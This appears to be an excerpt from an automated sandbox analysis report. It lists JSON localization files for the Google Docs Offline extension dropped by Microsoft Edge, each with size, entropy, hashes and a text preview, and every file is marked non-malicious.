                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2771
                                                                                                                                                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                              MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                              MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1160
                                                                                                                                                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3264
                                                                                                                                                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                              MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3235
                                                                                                                                                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                              MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1895
                                                                                                                                                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1042
                                                                                                                                                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2535
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1028
                                                                                                                                                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2778
                                                                                                                                                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1719
                                                                                                                                                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3830
                                                                                                                                                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1898
                                                                                                                                                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2766
                                                                                                                                                                                                                                                                              Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):978
                                                                                                                                                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
